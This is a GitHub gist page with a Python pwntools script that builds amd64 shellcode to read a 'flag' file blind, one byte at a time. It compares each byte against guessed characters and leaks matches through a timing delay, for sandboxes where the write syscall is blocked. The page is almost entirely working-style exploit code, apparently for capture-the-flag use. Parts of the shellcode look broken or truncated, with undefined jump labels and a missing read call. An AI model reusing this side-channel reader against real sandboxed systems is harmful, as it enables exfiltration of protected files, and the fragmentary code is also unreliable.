Skip to content

Instantly share code, notes, and snippets.

Last active May 8, 2017 06:35
  • Star 2 You must be signed in to star a gist
  • Fork 0 You must be signed in to fork a gist
Star You must be signed in to star a gist
What would you like to do?
Assembly-python blind file reader. Useful when the write syscall is not allowed.
#!/usr/bin/env python
from pwn import *
import string
import time
context.log_level = 'error'
u = make_unpacker(64, endian='little', sign='unsigned')
filename = hex(u('.///flag'))
flag = ""
pos = -1
lastchar = 0
while (lastchar < len(string.printable)):
for i in string.printable:
start = time.time()
shellcode = '''
xor rax, rax
xor rdi, rdi
push rdi
mov rdi, %s
push rdi
mov rdi, rsp
xor rsi, rsi
xor rdx, rdx
mov al, 2
mov rdi, rax
lea rsi, [rsp+8]
or rdx, 0xf
xor rax, rax
xor rdx, rdx
mov rdx, %s
mov al, byte [rsi+%s]
cmp rax, rdx
jnz exit
xor r11, r11
mov r11, 0
inc r11
cmp r11, 0x7fffffff
jb delay
xor rdi, rdi
mov al, 60
lastchar += 1
p = run_assembly(shellcode, arch="amd64")
end = time.time()
if ((end - start) > 0.5):
pos += 1
lastchar = 0
print "Found: %s"%i
flag = "%s%s"%(flag,i)
print "[*] String: %s"%flag
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment